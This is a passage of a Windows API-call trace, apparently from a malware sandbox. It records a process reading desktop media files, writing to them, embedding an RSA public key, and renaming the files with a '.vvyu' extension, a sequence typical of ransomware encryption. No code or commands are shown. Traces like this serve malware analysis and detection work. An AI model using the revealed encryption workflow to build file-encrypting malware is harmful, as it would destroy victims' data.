[0183.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30dd8 | out: hHeap=0x6a0000) returned 1 [0183.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3c208 | out: hHeap=0x6a0000) returned 1 [0183.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.526] WriteFile (in: hFile=0x584, lpBuffer=0x2d36670*, nNumberOfBytesToWrite=0x5b83, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d36670*, lpNumberOfBytesWritten=0x30ffb14*=0x5b83, lpOverlapped=0x0) returned 1 [0183.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.527] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5b88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.527] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.528] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.529] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.529] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.529] CloseHandle (hObject=0x584) returned 1 [0183.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0183.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d36670 [0183.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0183.533] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\dyhqUG0jR8D4ISRX0Nn1.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\dyhqug0jr8d4isrx0nn1.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\dyhqUG0jR8D4ISRX0Nn1.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\dyhqug0jr8d4isrx0nn1.flv.vvyu")) returned 1 [0183.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.536] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0183.538] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x105801e0, ftCreationTime.dwHighDateTime=0x1d89ab9, ftLastAccessTime.dwLowDateTime=0xa22f04e0, ftLastAccessTime.dwHighDateTime=0x1d8a565, ftLastWriteTime.dwLowDateTime=0xa22f04e0, ftLastWriteTime.dwHighDateTime=0x1d8a565, nFileSizeHigh=0x0, nFileSizeLow=0x99e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ed-zOTKEEUdYISk.mp4", cAlternateFileName="ED-ZOT~1.MP4")) returned 1 [0183.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30dd8 [0183.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30dd8 | out: hHeap=0x6a0000) returned 1 [0183.539] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\Ed-zOTKEEUdYISk.mp4") returned=".mp4" [0183.539] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Ed-zOTKEEUdYISk.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\ed-zotkeeudyisk.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.539] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=39399) returned 1 [0183.539] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.542] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x99c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.542] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.544] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.544] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x99e7, lpOverlapped=0x0) returned 1 [0183.544] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.544] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.544] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.545] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.546] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.546] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.546] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.546] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.546] GetLastError () returned 0x0 [0183.546] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.546] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.546] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.546] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.546] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x99f0) returned 0x2d36670 [0183.547] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30dd8 [0183.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30e20 [0183.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.548] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d40068 [0183.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d40288 [0183.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d40288 | out: hHeap=0x6a0000) returned 1 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e768 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e750 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d40068 | out: hHeap=0x6a0000) returned 1 [0183.551] GetCurrentThreadId () returned 0x264 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce380 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.551] GetCurrentThreadId () returned 0x264 [0183.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e768 [0183.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7c8 [0183.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7e0 [0183.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e780 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e750 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d40068 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d40278 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d40490 [0183.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: 